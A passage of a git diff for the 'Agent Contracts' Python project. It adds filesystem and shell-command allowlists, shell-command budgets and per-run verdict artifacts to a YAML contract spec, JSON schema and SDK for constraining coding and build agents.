(Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." }, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." } } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." } } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." + } + } } } } diff --git a/spec/SPECIFICATION.md b/spec/SPECIFICATION.md index a4cd901..87a3b23 100644 --- a/spec/SPECIFICATION.md +++ b/spec/SPECIFICATION.md @@ -2,258 +2,199 @@ ## Overview -An Agent Contract is a YAML document that declares what an agent **must do**, -**must not do**, and **what happens when it fails**. Contracts are enforced -at the runtime boundary by the SDK — never via prompts. +An Agent Contract is a repo-local YAML document that declares what an autonomous coding/build agent may do, what it must prove before a run is considered successful, and where the final verdict artifact should be written. -Contracts follow the **OpenAPI model**: a machine-readable document that -generates tooling leverage. Write a YAML file. Get cost control, tool-use -security, and audit trails. +The v0.1.0 surface is intentionally narrow: -## File Format +- authorize reads, writes, commands, tools, network, and state writes +- enforce resource budgets +- evaluate postconditions against outputs and recorded checks +- emit one durable verdict artifact for each run -Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. The SDK -also accepts any `.yaml` or `.yml` file. A JSON Schema is provided at -`schemas/agent-contract.schema.json` for editor support and machine validation. +## Core principles -### Forward Compatibility +1. **Repo-local first** — the contract belongs in the repository. +2. **Fail closed when configured** — coding/build scopes default to deny when present. +3. **One operator-readable verdict** — every meaningful run can end with one artifact. +4. **Host-agnostic core** — the contract is portable across local runtimes and CI. -- Unknown fields are **ignored** (must-ignore semantics) -- Extension fields use the `x-` prefix (e.g., `x-hipaa-compliance: true`) -- Spec version (`agent_contract` field) follows semver +## File format ---- +Contracts are YAML files, typically named `AGENT_CONTRACT.yaml`. +Unknown fields are ignored for forward compatibility. Extension fields use the `x-` prefix. -## Three Tiers - -Contracts use graduated tiers. Start simple, add guarantees as production demands. - -### Tier 0: Standalone (4 fields) - -**Purpose:** Self-documentation + local validation. Value without any runtime. - -| Field | Type | Required | Description | -|-------|------|----------|-------------| -| `agent_contract` | semver string | Yes | Spec version (e.g., `"0.1.0"`) | -| `identity.name` | string | Yes | Unique agent identifier | -| `identity.version` | semver string | Yes | Agent implementation version | -| `contract.postconditions[]` | array (min 1) | Yes | Machine-checkable output guarantees | - -A Tier 0 contract is useful on its own: it documents what the agent guarantees -and can be validated locally with `aicontracts validate`. - -### Tier 1: Enforceable (adds runtime value) - -Everything in Tier 0, plus: - -| Field | What It Solves | -|-------|---------------| -| `inputs.schema` | Reject malformed inputs before execution (JSON Schema) | -| `outputs.schema` | Validate structured output, catch schema drift (JSON Schema) | -| `effects.authorized` | Default-deny tool allowlist + network + state writes | -| `resources.budgets` | `max_cost_usd`, `max_tokens`, `max_tool_calls`, `max_duration_seconds` | - -The SDK enforces Tier 1 fields at the boundary: input validation, tool gating, -budget circuit breakers, and output validation. - -### Tier 2: Composable (adds multi-agent + compliance value) - -Everything in Tier 1, plus: +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: produces_output + check: "output is not None" +``` -| Field | What It Solves | -|-------|---------------| -| `failure_model` | Typed errors with retry/fallback semantics | -| `effects.declared` | Effect footprint for audit trails (composes via union) | -| `delegation` | Max depth, attenuation rules, sub-agent requirements | -| `observability` | Required OTel spans/events + violation event schema | -| `versioning` | Content-addressed build ID + breaking change rules | -| `slo` | Target rates for contract satisfaction, latency, cost | +## Tiers ---- +### Tier 0 — Standalone -## Field Reference +Required fields: -### `agent_contract` (required) +- `agent_contract` +- `identity.name` +- `identity.version` +- `contract.postconditions[]` -```yaml -agent_contract: "0.1.0" -``` +### Tier 1 — Enforceable -Spec version. Enables forward compatibility. +Adds runtime enforcement value: -### `identity` (required) +- `inputs.schema` +- `outputs.schema` +- `effects.authorized` +- `resources.budgets` -```yaml -identity: - name: support-triage-agent - version: "2.1.0" - description: Triages support tickets by priority. - authors: - - Piyush Vyas -``` +Tier 1 is where coding/build guardrails live. -### `contract.postconditions` (required, min 1) +### Tier 2 — Composable -```yaml -contract: - postconditions: - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' - enforcement: sync_block # sync_block | sync_warn | async_monitor - severity: critical # critical | major | minor - description: Priority must be valid. - slo: - target_rate: 0.995 - window: "24h" -``` +Adds broader composition and observability features: -**Enforcement timing:** -- `sync_block`: Fails the invocation if the check fails -- `sync_warn`: Logs a warning, emits a violation event, but allows the result -- `async_monitor`: Deferred evaluation (e.g., LLM-as-judge quality checks) +- `failure_model` +- `effects.declared` +- `delegation` +- `observability` +- `versioning` +- `slo` -**Check syntax:** CEL-like expressions evaluated safely (no `eval()`): -- `output is not None` -- `output.status == "resolved"` -- `output.status in ["resolved", "escalated"]` -- `len(output.items) > 0` -- `output.score >= 0.8` -- `eval:judge` (LLM-as-judge, async only in v0.1) +## Authorized effects -### `effects` (Tier 1+) +`effects.authorized` declares what the agent may do. ```yaml effects: - authorized: # Capability scope — what the agent MAY do + authorized: tools: - search - - database.* # Glob patterns supported network: - "https://api.example.com/*" state_writes: - "tickets.*" - - declared: # Effect footprint — what actually happens (Tier 2) - tools: - - search - network: - - "https://api.example.com/search" - state_writes: - - "tickets.priority" + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" ``` -**Key rules:** -- `effects.authorized` is **default-deny**: tools not listed are blocked -- During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` +Rules: + +- tools, network, and state writes are default-deny when configured +- filesystem read/write scopes are default-deny when configured +- shell commands are matched against normalized command strings with glob patterns +- during delegation, authorized effects attenuate by intersection -### `resources.budgets` (Tier 1+) +## Budgets ```yaml resources: budgets: - max_cost_usd: 0.50 - max_tokens: 15000 + max_cost_usd: 1.00 + max_tokens: 50000 max_tool_calls: 20 - max_duration_seconds: 30.0 + max_shell_commands: 10 + max_duration_seconds: 1800 ``` -Per-invocation limits. The SDK trips a circuit breaker when any threshold is exceeded. +`max_shell_commands` is specific to coding/build workflows and complements tool-call budgets. -### `failure_model` (Tier 2) +## Postconditions and recorded checks + +Postconditions are safe expression checks evaluated against `output` plus any extra context provided by the runtime. ```yaml -failure_model: - errors: - - name: timeout - retryable: true - max_retries: 3 - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - default_timeout_seconds: 30.0 - circuit_breaker: - failure_threshold: 5 - reset_timeout_seconds: 60.0 +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical ``` -### `delegation` (Tier 2) +Supported expression forms include: -```yaml -delegation: - max_depth: 2 - attenuate_effects: true # Intersect authorized effects during delegation - require_contract: true # Sub-agents must have their own contract - allowed_agents: - - cache-agent - - summarizer -``` +- `output is not None` +- `output.status == "ok"` +- `output.status in ["ok", "warn"]` +- `len(output.items) > 0` +- `checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0` -### `observability` (Tier 2) +## Observability and verdict artifacts ```yaml observability: - traces: - enabled: true - sample_rate: 1.0 - metrics: - - name: latency_ms - type: histogram - violation_events: - emit: true - destination: otel # stdout | otel | callback + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" ``` -### `versioning` (Tier 2) +The path may contain `{run_id}`. +If omitted, runtimes may default to `.agent-contracts/runs/{run_id}/verdict.json`. -```yaml -versioning: - build_id: "sha256:abc123..." - breaking_changes: [] - substitution: - compatible_with: - - "1.0.0" -``` +Verdict artifacts include: -### `slo` (Tier 2) +- contract identity + spec version +- host identity +- `outcome`: `pass | warn | blocked | fail` +- `final_gate`: `allowed | blocked | failed` +- violations +- executed checks +- budget snapshot +- artifact metadata -```yaml -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - latency: - p50_ms: 500 - p99_ms: 5000 - cost: - avg_usd: 0.10 - p99_usd: 0.50 - error_budget_policy: freeze_deployments -``` +## Outcome semantics ---- +- `pass` — required checks and blocking clauses passed +- `warn` — non-blocking warnings were recorded +- `blocked` — an effect or budget violation denied the run in-flight +- `fail` — the run completed, but required checks or critical postconditions failed -## Breaking Change Rules +## Example coding-agent contract -For the v0.x series: -- Adding optional fields is **not** a breaking change -- Removing or renaming fields **is** a breaking change -- Changing field semantics **is** a breaking change -- Adding new required fields **is** a breaking change +```yaml +agent_contract: "0.1.0" +identity: + name: repo-build-agent + version: "0.1.0" +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md"] + write: ["src/**", "tests/**"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" +resources: + budgets: + max_shell_commands: 10 +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" +``` -From v1.0 onward: no breaking changes within a major version. +## Compatibility notes ---- +Within v0.1.0: -## Positioning +- adding optional fields is backward-compatible +- removing fields is breaking +- changing field semantics is breaking +- new required fields are breaking -| Layer | What It Does | What Contracts Add | -|-------|-------------|-------------------| -| **MCP** | Tool transport (JSON-RPC) | Policy layer above transport | -| **Agent Skills** | Capability discovery (Markdown) | Machine-enforceable guarantees | -| **A2A** | Agent discovery and routing | Behavioral guarantees on routes | -| **AWS AgentCore** | Cedar policy enforcement | Portable, open spec | -| **LangChain/CrewAI** | Agent orchestration | Declarative, out-of-process enforcement | -| **OpenAPI** | Structural API contracts | Behavioral contracts for non-deterministic agents | +This repo intentionally does **not** use v0.1.0 to broaden into hosted policy platforms or generic agent governance. diff --git a/src/agent_contracts/__init__.py b/src/agent_contracts/__init__.py index 7a9bd09..0f0f427 100644 --- a/src/agent_contracts/__init__.py +++ b/src/agent_contracts/__init__.py @@ -1,4 +1,4 @@ -"""Agent Contracts — YAML spec + validation SDK for production agent reliability. +"""Agent Contracts — repo-local contracts for coding/build agents. Quick start: from agent_contracts import load_contract, ContractEnforcer @@ -6,15 +6,23 @@ contract = load_contract("AGENT_CONTRACT.yaml") with ContractEnforcer(contract) as enforcer: enforcer.check_tool_call("search") - enforcer.add_cost(0.05) + enforcer.check_file_write("src/app.py") + enforcer.check_shell_command("python -m pytest tests/") enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) """ from agent_contracts._version import __version__ from agent_contracts.budgets import BudgetExceededError, BudgetTracker from agent_contracts.composition import CompatibilityReport, check_compatibility from agent_contracts.effects import EffectDeniedError, EffectGuard -from agent_contracts.enforcer import ContractEnforcer, ContractViolation, enforce_contract +from agent_contracts.enforcer import ( + ContractEnforcer, + ContractViolation, + RunCheckResult, + RunVerdict, + enforce_contract, +) from agent_contracts.loader import ContractLoadError, load_contract, validate_contract from agent_contracts.postconditions import PostconditionError, PreconditionError from agent_contracts.tier import TierRecommendation, assess_tier, recommend_upgrades @@ -25,10 +33,12 @@ EffectsAuthorized, EffectsDeclared, FailureModel, + FilesystemAuthorization, ObservabilityConfig, PostconditionDef, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, VersioningConfig, ) @@ -36,44 +46,39 @@ __all__ = [ "__version__", - # Core types "Contract", "ContractIdentity", "PostconditionDef", "PreconditionDef", "EffectsAuthorized", "EffectsDeclared", + "FilesystemAuthorization", + "ShellAuthorization", "ResourceBudgets", "DelegationRules", "FailureModel", "ObservabilityConfig", "VersioningConfig", "SLOConfig", - # Loading "load_contract", "validate_contract", "ContractLoadError", - # Tier "assess_tier", "recommend_upgrades", "TierRecommendation", - # Enforcement "ContractEnforcer", "ContractViolation", + "RunCheckResult", + "RunVerdict", "enforce_contract", - # Effects "EffectGuard", "EffectDeniedError", - # Budgets "BudgetTracker", "BudgetExceededError", - # Postconditions "PostconditionError", "PreconditionError", - # Violations "ViolationEvent", "ViolationEmitter", - # Composition "check_compatibility", "CompatibilityReport", ] diff --git a/src/agent_contracts/_version.py b/src/agent_contracts/_version.py index 3cd27c7..ce692bc 100644 --- a/src/agent_contracts/_version.py +++ b/src/agent_contracts/_version.py @@ -1,3 +1,3 @@ """Agent Contracts version.""" -__version__ = "0.1.1" +__version__ = "0.2.0" diff --git a/src/agent_contracts/adapters/claude_agent.py b/src/agent_contracts/adapters/claude_agent.py index 688b419..e6b6e0a 100644 --- a/src/agent_contracts/adapters/claude_agent.py +++ b/src/agent_contracts/adapters/claude_agent.py @@ -1,4 +1,4 @@ -"""Claude Agent SDK adapter — contract enforcement via hooks. +"""Claude Agent SDK adapter — repo-local contract enforcement via hooks. Usage (3 lines): from agent_contracts.adapters.claude_agent import ContractHooks diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py index 79b178a..b84f5f5 100644 --- a/src/agent_contracts/adapters/crewai.py +++ b/src/agent_contracts/adapters/crewai.py @@ -100,6 +100,6 @@ def wrapped(*args: Any, **kwargs: Any) -> Any: self._enforcer.check_tool_call(tool_name) return tool_fn(*args, **kwargs) - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] + wrapped.__name__ = tool_fn.__name__ wrapped.__doc__ = tool_fn.__doc__ return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index fad45d0..3519473 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -1,4 +1,4 @@ -"""OpenAI Agents SDK adapter — contract enforcement via RunHooks. +"""OpenAI Agents SDK adapter — repo-local contract enforcement via RunHooks. Usage (3 lines): from agent_contracts.adapters.openai_agents import ContractRunHooks diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py index 442ca72..f2e89e4 100644 --- a/src/agent_contracts/adapters/pydantic_ai.py +++ b/src/agent_contracts/adapters/pydantic_ai.py @@ -116,6 +116,6 @@ def wrapped(*args: Any, **kwargs: Any) -> Any: self._enforcer.check_tool_call(tool_name) return tool_fn(*args, **kwargs) - wrapped.__name__ = tool_fn.__name__ # type: ignore[attr-defined] + wrapped.__name__ = tool_fn.__name__ wrapped.__doc__ = tool_fn.__doc__ return wrapped diff --git a/src/agent_contracts/budgets.py b/src/agent_contracts/budgets.py index ae87c51..a63b44c 100644 --- a/src/agent_contracts/budgets.py +++ b/src/agent_contracts/budgets.py @@ -1,6 +1,6 @@ """Budget enforcement — per-invocation resource limits with circuit breaker. -Thread-safe counters for cost, tokens, tool calls, and elapsed time. +Thread-safe counters for cost, tokens, tool calls, shell commands, and elapsed time. """ from __future__ import annotations @@ -32,37 +32,28 @@ class BudgetSnapshot: cost_usd: float = 0.0 tokens: int = 0 tool_calls: int = 0 + shell_commands: int = 0 elapsed_seconds: float = 0.0 class BudgetTracker: - """Thread-safe budget tracker with circuit breaker. - - Tracks cost, tokens, tool calls, and elapsed time against configured limits. - Raises BudgetExceededError when a threshold is hit. - """ + """Thread-safe budget tracker with circuit breaker.""" def __init__( self, budgets: Optional[ResourceBudgets] = None, cost_callback: Optional[Callable[[], float]] = None, ) -> None: - """ - Args: - budgets: Resource limits to enforce. None = no enforcement. - cost_callback: Optional callable that returns current accumulated cost. - If not provided, cost must be reported via add_cost(). - """ self._budgets = budgets self._cost_callback = cost_callback self._lock = threading.Lock() self._cost_usd: float = 0.0 self._tokens: int = 0 self._tool_calls: int = 0 + self._shell_commands: int = 0 self._start_time: float = time.monotonic() def _safe_cost_callback(self) -> float: - """Call cost callback safely, falling back to internal counter on error.""" if self._cost_callback: try: return self._cost_callback() @@ -72,22 +63,20 @@ def _safe_cost_callback(self) -> float: @property def is_configured(self) -> bool: - """Whether any budget limits are configured.""" return self._budgets is not None def snapshot(self) -> BudgetSnapshot: - """Get a thread-safe snapshot of current consumption.""" with self._lock: cost = self._safe_cost_callback() return BudgetSnapshot( cost_usd=cost, tokens=self._tokens, tool_calls=self._tool_calls, + shell_commands=self._shell_commands, elapsed_seconds=time.monotonic() - self._start_time, ) def add_cost(self, amount: float) -> None: - """Record cost and check against limit.""" if amount < 0: raise ValueError("Cost amount must be non-negative.") with self._lock: @@ -95,7 +84,6 @@ def add_cost(self, amount: float) -> None: self._check_cost() def add_tokens(self, count: int) -> None: - """Record token usage and check against limit.""" if count < 0: raise ValueError("Token count must be non-negative.") with self._lock: @@ -103,21 +91,24 @@ def add_tokens(self, count: int) -> None: self._check_tokens() def record_tool_call(self) -> None: - """Record a tool call and check against limit.""" with self._lock: self._tool_calls += 1 self._check_tool_calls() + def record_shell_command(self) -> None: + with self._lock: + self._shell_commands += 1 + self._check_shell_commands() + def check_all(self) -> None: - """Check all budget limits. Raises BudgetExceededError on first violation.""" with self._lock: self._check_cost() self._check_tokens() self._check_tool_calls() + self._check_shell_commands() self._check_duration() def check_duration(self) -> None: - """Check elapsed time against limit.""" with self._lock: self._check_duration() @@ -143,6 +134,15 @@ def _check_tool_calls(self) -> None: float(self._budgets.max_tool_calls), ) + def _check_shell_commands(self) -> None: + if self._budgets and self._budgets.max_shell_commands is not None: + if self._shell_commands > self._budgets.max_shell_commands: + raise BudgetExceededError( + "shell_commands", + float(self._shell_commands), + float(self._budgets.max_shell_commands), + ) + def _check_duration(self) -> None: if self._budgets and self._budgets.max_duration_seconds is not None: elapsed = time.monotonic() - self._start_time @@ -152,9 +152,9 @@ def _check_duration(self) -> None: ) def reset(self) -> None: - """Reset all counters and restart the timer.""" with self._lock: self._cost_usd = 0.0 self._tokens = 0 self._tool_calls = 0 + self._shell_commands = 0 self._start_time = time.monotonic() diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index b0cb337..fe89f54 100644 --- a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -1,4 +1,4 @@ -"""CLI for Agent Contracts — validate, check-compat, init, test.""" +"""CLI for Agent Contracts — repo-local guardrails for coding/build agents.""" from __future__ import annotations @@ -11,12 +11,13 @@ import yaml from agent_contracts._version import __version__ +from agent_contracts.enforcer import load_verdict_artifact @click.group() @click.version_option(version=__version__, prog_name="aicontracts") def main() -> None: - """Agent Contracts — YAML spec + SDK for production agent reliability.""" + """Agent Contracts — repo-local fail-closed guardrails for coding/build agents.""" pass @@ -25,25 +26,25 @@ def main() -> None: @click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") def validate(contract_path: str, json_output: bool) -> None: """Validate a contract YAML file against the spec.""" - from agent_contracts.loader import ( - ContractLoadError, - load_contract_yaml, - validate_contract, - ) + from agent_contracts.loader import ContractLoadError, load_contract_yaml, validate_contract from agent_contracts.tier import assess_tier, recommend_upgrades try: data = load_contract_yaml(contract_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) errors = validate_contract(data) tier = assess_tier(data) recommendations = recommend_upgrades(data, tier) - tier_names = {0: "Standalone", 1: "Enforceable", 2: "Composable"} + authorized = data.get("effects", {}).get("authorized", {}) + filesystem = authorized.get("filesystem", {}) if isinstance(authorized, dict) else {} + shell = authorized.get("shell", {}) if isinstance(authorized, dict) else {} + observability = data.get("observability", {}) + if json_output: result = { "valid": len(errors) == 0, @@ -51,33 +52,45 @@ def validate(contract_path: str, json_output: bool) -> None: "tier_name": tier_names.get(tier, "Unknown"), "errors": errors, "recommendations": [ - {"field": r.field, "target_tier": r.target_tier, "reason": r.reason} - for r in recommendations + { + "field": item.field, + "target_tier": item.target_tier, + "reason": item.reason, + } + for item in recommendations ], + "coding_surfaces": { + "filesystem_read": filesystem.get("read", []), + "filesystem_write": filesystem.get("write", []), + "shell_commands": shell.get("commands", []), + "run_artifact_path": observability.get("run_artifact_path"), + }, } click.echo(json.dumps(result, indent=2)) else: identity = data.get("identity", {}) - name = identity.get("name", "unknown") - version = identity.get("version", "?") - - click.echo(f"Contract: {name}@{version}") + click.echo(f"Contract: {identity.get('name', 'unknown')}@{identity.get('version', '?')}") click.echo(f"Spec version: {data.get('agent_contract', '?')}") - if errors: click.echo(f"\nValidation: FAILED ({len(errors)} error(s))") - for e in errors: - click.echo(f" - {e}") + for error in errors: + click.echo(f" - {error}") sys.exit(1) - else: - click.echo("\nValidation: PASSED") - + click.echo("\nValidation: PASSED") click.echo(f"Tier: {tier} ({tier_names.get(tier, 'Unknown')})") - + if filesystem or shell or observability.get("run_artifact_path"): + click.echo("\nCoding/build surfaces:") + if filesystem: + click.echo(f" read: {filesystem.get('read', [])}") + click.echo(f" write: {filesystem.get('write', [])}") + if shell: + click.echo(f" shell: {shell.get('commands', [])}") + if observability.get("run_artifact_path"): + click.echo(f" verdict artifact: {observability['run_artifact_path']}") if recommendations: click.echo(f"\nRecommendations to reach Tier {tier + 1}:") - for r in recommendations: - click.echo(f" + {r.field}: {r.reason}") + for item in recommendations: + click.echo(f" + {item.field}: {item.reason}") if errors: sys.exit(1) @@ -95,23 +108,30 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N try: producer = load_contract(producer_path) consumer = load_contract(consumer_path) - except ContractLoadError as e: - click.echo(f"Error: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error: {exc}", err=True) sys.exit(1) report = check_compatibility(producer, consumer) - if json_output: result = { "compatible": report.compatible, "producer": report.producer, "consumer": report.consumer, - "schema_gaps": [{"field": g.field_path, "issue": g.issue} for g in report.schema_gaps], - "capability_gaps": [{"tool": g.tool, "reason": g.reason} for g in report.capability_gaps], + "schema_gaps": [ + {"field": gap.field_path, "issue": gap.issue} for gap in report.schema_gaps + ], + "capability_gaps": [ + {"tool": gap.tool, "reason": gap.reason} for gap in report.capability_gaps + ], "budget_gaps": [ - {"type": g.budget_type, "producer_limit": g.producer_limit, - "consumer_limit": g.consumer_limit, "issue": g.issue} - for g in report.budget_gaps + { + "type": gap.budget_type, + "producer_limit": gap.producer_limit, + "consumer_limit": gap.consumer_limit, + "issue": gap.issue, + } + for gap in report.budget_gaps ], "effect_violations": report.effect_violations, "warnings": report.warnings, @@ -119,44 +139,50 @@ def check_compat(producer_path: str, consumer_path: str, json_output: bool) -> N click.echo(json.dumps(result, indent=2)) else: click.echo(report.summary()) - if report.schema_gaps: click.echo("\nSchema gaps:") - for g in report.schema_gaps: - click.echo(f" - {g.field_path}: {g.issue}") - + for gap in report.schema_gaps: + click.echo(f" - {gap.field_path}: {gap.issue}") if report.capability_gaps: click.echo("\nCapability gaps:") - for g in report.capability_gaps: - click.echo(f" - {g.tool}: {g.reason}") - + for capability_gap in report.capability_gaps: + click.echo(f" - {capability_gap.tool}: {capability_gap.reason}") if report.budget_gaps: click.echo("\nBudget gaps:") - for g in report.budget_gaps: - click.echo(f" - {g.issue}") - + for budget_gap in report.budget_gaps: + click.echo(f" - {budget_gap.issue}") if report.effect_violations: click.echo("\nEffect violations:") - for v in report.effect_violations: - click.echo(f" - {v}") - + for violation in report.effect_violations: + click.echo(f" - {violation}") if report.warnings: click.echo("\nWarnings:") - for w in report.warnings: - click.echo(f" - {w}") + for warning in report.warnings: + click.echo(f" - {warning}") if not report.compatible: sys.exit(1) @main.command() -@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), - help="JSONL trace file to generate from.") +@click.option("--from-trace", "-t", "trace_path", type=click.Path(exists=True), help="JSONL trace file to generate from.") @click.option("--name", "-n", "agent_name", help="Agent name override.") @click.option("--version", "-v", "agent_version", help="Agent version override.") @click.option("--output", "-o", "output_path", type=click.Path(), help="Output file path.") -def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Optional[str], - output_path: Optional[str]) -> None: +@click.option( + "--template", + 